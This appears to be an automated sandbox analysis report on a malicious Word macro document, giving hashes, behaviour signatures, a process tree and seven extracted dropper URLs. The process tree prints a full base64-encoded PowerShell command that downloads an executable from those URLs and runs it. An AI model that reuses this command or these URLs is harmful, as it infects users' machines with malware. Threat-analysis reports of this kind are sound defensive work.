Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    13-05-2024 11:25

General

  • Target

    3f3eb915de6de83a34bed6bf8bc443d3_JaffaCakes118.doc

  • Size

    224KB

  • MD5

    3f3eb915de6de83a34bed6bf8bc443d3

  • SHA1

    b7feae0281f6f93bf099ccdc289b64cb41ed4c22

  • SHA256

    2e5140ce6f07ccdb25a15fb6c1008747910cd83336a3c043baee30b68a3b45fd

  • SHA512

    a9be5ebfb40662cf08e30264ca00c2c19d49c337a585fd6ee076af1d755bc2f42faa3ccf592a27fcc31973fcd9fd4196838aff5d1c398191fa7ea93aab9f8976

  • SSDEEP

    3072:FYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////k:/0uXnWFchmmcI/o1/S1iYKw7muFi

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://masque.es/stat/HWDzR/

exe.dropper

http://mesdelicesitaliens.fr/wp-admin/file/IIck/

exe.dropper

http://lidiscom.com.br/BKP_TinaPOS/attach/UlijfEK/

exe.dropper

http://facanha.com.br/temp/file/VFyitEUEZ/

exe.dropper

https://attech.ml/wp-admin/yZDBlYkJtq/

exe.dropper

http://admvero.com.br/minhaagua/hLwOiX/

exe.dropper

https://dev.dosily.in/wp-content/attach/zdRHVDCwl/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3f3eb915de6de83a34bed6bf8bc443d3_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABGADcANAB5AGMAcgA3AD0AKAAnAEQAJwArACgAJwBrACcAKwAnAGgAbgAxACcAKQArACcAMgB1ACcAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdABlAE0AUABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAEUAYwB0AG8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBjAHUAcgBpAGAAVAB5AHAAcgBvAGAAVABvAGMAbwBsACIAIAA9ACAAKAAoACcAdABsAHMAJwArACcAMQAnACkAKwAoACcAMgAsACAAJwArACcAdAAnACkAKwAoACcAbABzADEAMQAsACcAKwAnACAAJwArACcAdAAnACkAKwAnAGwAcwAnACkAOwAkAFIAawB3ADcAdQBzAGwAIAA9ACAAKAAoACcARAAxACcAKwAnADEAbwBuACcAKQArACcAZwAnACsAJwA0ADMAJwApADsAJABDAGkAMwA0ADgAXwBrAD0AKAAnAFYAMgAnACsAKAAnAG4AeQBrADgAJwArACcAbAAnACkAKQA7ACQAVQByAHEAcgA1AG0AOAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACgAJwBUACcAKwAnADQAWgB3AG8AJwApACsAKAAnAHIAZABUADQAWgAnACsAJwAyACcAKQArACgAJwAwACcAKwAnADEAOQAnACkAKwAnAFQAJwArACcANABaACcAKQAgACAALQBjAFIAZQBwAGwAQQBDAEUAIAAgACgAWwBDAEgAYQByAF0AOAA0ACsAWwBDAEgAYQByAF0ANQAyACsAWwBDAEgAYQByAF0AOQAwACkALABbAEMASABhAHIAXQA5ADIAKQArACQAUgBrAHcANwB1AHMAbAArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAEgAbAB0AGYAdQBuADkAPQAoACcAWAAzACcAKwAnADUANAAnACsAKAAnADkAMgAnACsAJwBiACcAKQApADsAJABFAGIAegByADYANAB4AD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAdAAuAFcAZQBCAEMATABJAEUAbgBUADsAJABDAGcAZwA4AGIAbwA0AD0AKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKwAnADoAJwArACgAJwAvAC8AJwArACcAbQBhACcAKQArACcAcwAnACsAJwBxAHUAJwArACcAZQAnACsAKAAnAC4AZQAnACsAJwBzACcAKQArACgAJwAvAHMAJwArACcAdABhAHQAJwApACsAKAAnAC8AJwArACcASABXACcAKQArACcARAAnACsAJwB6AFIAJwArACgAJwAvACoAaAAnACsAJwB0AHQAcAA6ACcAKwAnAC8ALwBtAGUAJwApACsAJwBzAGQAJwArACcAZQBsACcAKwAoACcAaQAnACsAJwBjAGUAcwBpAHQAYQBsACcAKQArACcAaQAnACsAJwBlAG4AJwArACgAJwBzAC4AJwArACcAZgAnACsAJwByAC8AdwBwACcAKQArACcALQBhACcAKwAoACcAZAAnACsAJwBtAGkAJwArACcAbgAvAGYAJwApACsAKAAnAGkAbABlAC8AJwArACcASQBJAGMAJwApACsAKAAnAGsALwAqAGgAdAB0AHAAJwArACcAOgAnACkAKwAoACcALwAvACcAKwAnAGwAaQBkAGkAcwAnACsAJwBjACcAKQArACcAbwBtACcAKwAoACcALgAnACsAJwBjAG8AbQAuACcAKQArACgAJwBiACcAKwAnAHIALwBCACcAKQArACgAJwBLAFAAXwAnACsAJwBUAGkAbgAnACsAJwBhAFAAJwArACcATwBTACcAKwAnAC8AYQB0ACcAKwAnAHQAYQBjAGgALwAnACkAKwAnAFUAbAAnACsAJwBpACcAKwAoACcAagAnACsAJwBmAEUASwAnACkAKwAnAC8AJwArACgAJwAqACcAKwAnAGgAdAAnACkAKwAoACcAdABwACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBmAGEAYwBhAG4AaAAnACsAJwBhAC4AJwArACcAYwBvACcAKwAnAG0ALgBiAHIALwB0AGUAbQBwAC8AJwApACsAJwBmACcAKwAoACcAaQBsAGUAJwArACcALwAnACkAKwAnAFYAJwArACcARgAnACsAKAAnAHkAaQAnACsAJwB0AEUAVQBFAFoAJwApACsAKAAnAC8AKgBoAHQAJwArACcAdAAnACsAJwBwAHMAOgAvAC8AJwArACcAYQB0ACcAKwAnAHQAZQBjAGgALgAnACkAKwAoACcAbQBsAC8AJwArACcAdwAnACkAKwAoACcAcAAtACcAKwAnAGEAZABtAGkAbgAnACkAKwAoACcALwB5AFoARABCACcAKwAnAGwAJwArACcAWQAnACkAKwAoACcAawBKACcAKwAnAHQAcQAnACkAKwAnAC8AKgAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAOgAvAC8AJwApACsAKAAnAGEAZAAnACsAJwBtAHYAZQAnACsAJwByACcAKQArACcAbwAuACcAKwAnAGMAbwAnACsAJwBtACcAKwAoACcALgBiACcAKwAnAHIALwBtAGkAJwApACsAKAAnAG4AaAAnACsAJwBhAGEAJwApACsAKAAnAGcAdQAnACsAJwBhACcAKwAnAC8AJwArACcAaABMAHcATwBpAFgALwAqACcAKwAnAGgAdAB0ACcAKQArACcAcAAnACsAJwBzADoAJwArACgAJwAvAC8AZAAnACsAJwBlAHYAJwApACsAJwAuACcAKwAoACcAZABvAHMAJwArACcAaQBsACcAKQArACcAeQAnACsAJwAuACcAKwAnAGkAJwArACgAJwBuAC8AdwAnACsAJwBwAC0AYwAnACkAKwAnAG8AbgAnACsAKAAnAHQAZQAnACsAJwBuACcAKQArACcAdAAvACcAKwAoACcAYQAnACsAJwB0AHQAYQBjAGgALwB6AGQAUgAnACsAJwBIAFYARAAnACsAJwBDAHcAJwApACsAJwBsACcAKwAnAC8AJwApAC4AIgBTAFAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEIAbgAwAGkAZABuAGkAPQAoACcAWAAnACsAKAAnAGkAJwArACcANwBhAGcAJwApACsAJwBhADUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVQBwADkAMABqAHIAOQAgAGkAbgAgACQAQwBnAGcAOABiAG8ANAApAHsAdAByAHkAewAkAEUAYgB6AHIANgA0AHgALgAiAEQAbwB3AGAATgBMAG8AQQBEAGAARgBgAGkAbABFACIAKAAkAFUAcAA5ADAAagByADkALAAgACQAVQByAHEAcgA1AG0AOAApADsAJABLADMAYwA2AGoAdwAyAD0AKAAoACcASAAnACsAJwBiADcAJwApACsAKAAnAGYAZwAnACsAJwByAGgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQByAHEAcgA1AG0AOAApAC4AIgBMAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAMgAwADIAOAApACAAewAuACgAJwBJAG4AdgBvAGsAJwArACcAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACgAJABVAHIAcQByADUAbQA4ACkAOwAkAEgAdwA4ADAAYwBzADkAPQAoACcARgBpACcAKwAnAGwAcgAnACsAKAAnADkAJwArACcAdQA4ACcAKQApADsAYgByAGUAYQBrADsAJABBAG4AZgB5AGcANQBwAD0AKAAnAEYAOQAnACsAKAAnAGIAcwBkAGYAJwArACcAcAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQBsADcAbwA5ADYAbQA9ACgAKAAnAEQAJwArACcAMwBhAG8AJwApACsAKAAnAHAAagAnACsAJwBvACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2604

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      9fcfb201c6d97d54327bcf23159f90d1

      SHA1

      038d1cece1e215dd35e66bb96aaf36f920221aa1

      SHA256

      67a8bc4505bdb119ec44e6a51a0a68d0d23cc625998efba4f0e7432f938d3bee

      SHA512

      a26e03d0a647b200a753730a6af306745076b47bb9d8b318a840f46e9c2b52e64adc1e788de493aa446099df41d1fd7aebb034045235337aa85780f0f165fc30

    • memory/2208-32-0x0000000005590000-0x0000000005690000-memory.dmp

      Filesize

      1024KB

    • memory/2208-66-0x000000007122D000-0x0000000071238000-memory.dmp

      Filesize

      44KB

    • memory/2208-31-0x0000000005590000-0x0000000005690000-memory.dmp

      Filesize

      1024KB

    • memory/2208-7-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/2208-8-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/2208-25-0x0000000005590000-0x0000000005690000-memory.dmp

      Filesize

      1024KB

    • memory/2208-27-0x0000000005590000-0x0000000005690000-memory.dmp

      Filesize

      1024KB

    • memory/2208-26-0x0000000005590000-0x0000000005690000-memory.dmp

      Filesize

      1024KB

    • memory/2208-6-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/2208-2-0x000000007122D000-0x0000000071238000-memory.dmp

      Filesize

      44KB

    • memory/2208-0-0x000000002F721000-0x000000002F722000-memory.dmp

      Filesize

      4KB

    • memory/2208-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2208-44-0x000000007122D000-0x0000000071238000-memory.dmp

      Filesize

      44KB

    • memory/2208-45-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/2208-47-0x0000000005590000-0x0000000005690000-memory.dmp

      Filesize

      1024KB

    • memory/2208-48-0x0000000005590000-0x0000000005690000-memory.dmp

      Filesize

      1024KB

    • memory/2208-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2604-38-0x000000001B210000-0x000000001B4F2000-memory.dmp

      Filesize

      2.9MB

    • memory/2604-39-0x0000000002410000-0x0000000002418000-memory.dmp

      Filesize

      32KB